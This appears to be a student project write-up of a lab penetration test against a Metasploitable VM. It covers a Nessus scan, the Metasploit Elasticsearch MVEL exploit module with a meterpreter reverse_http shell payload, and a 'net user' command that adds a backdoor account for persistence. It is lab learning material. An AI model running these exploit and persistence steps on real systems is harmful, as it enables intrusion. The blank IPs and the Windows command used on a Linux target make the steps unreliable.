What it does

How I built it

Challenges I ran into

Accomplishments that I'm proud of

What I learned


OVERVIEW: I performed a nesses scan on a Metasploitable VM to find vulnerabilities. I used one of these vulnerabilities to get Remote access to the Metasploitable VM from my Kali VM. I used Metasploit in my Kali VM to hack the vulnerabilities and get a shell. I am including the screenshot of the payload I used and the commands I used. We will also add a user to get future access to the target machine. HACK: The IP address of my Metaspolitable VM is step 1: So the first step to get remote access to a computer is to get the IP address of that computer. Step 2: Perform a scan to check for vulnerabilities. I performed a Nessus scan. I first downloaded and installed Nessus on my kali VM. After installation, I opened Nessus in a browser in my host system for bigger screen size by going to this URL https://kali.ip:8834. The IP address of my kali VM is so I used the URL (port 8834 is a TCP/UDP port). After Nessus has been successfully installed we click on ‘+ New Scan’ in the main Web UI. We enter the IP address of our target machine. Step 3: SELECT A VULNERABILITY: I found many vulnerabilities in that system. I chose the Elastic Search vulnerability. The target machine is running an older version of Elastic Search v 1.1.1 which is an older and unpatched software running on the target machine. (it is advisable to update the software installed with new patches to avoid getting hacked). Step 4: use the command msfconsole to open Metasploit in Kali VM. Step 5: reconfirm the presence of the installed software that contains the vulnerability you are going to exploit. we will use the following command line code msf> use exploit/multi/elasticsearch/script_mvel_rce We set the rhost to the ip address of the target machine.

Step 6: I wrote this payload to get shell access. 'Set payload java/meterpreter/reverse_http'

Step 7: we got shell access. Now we will add a user to the group so we can get an account in the target system and we can access the system anytime in the future. Step 8: username of the account: spring2018 Password:spring2018 use the command ‘net user spring2018 spring2018 /add’

We just owned a machine!!!!!!!

Built With

  • kali
  • metasploitable
  • metaspoit-modules
  • nessus
  • ubuntu
Share this project: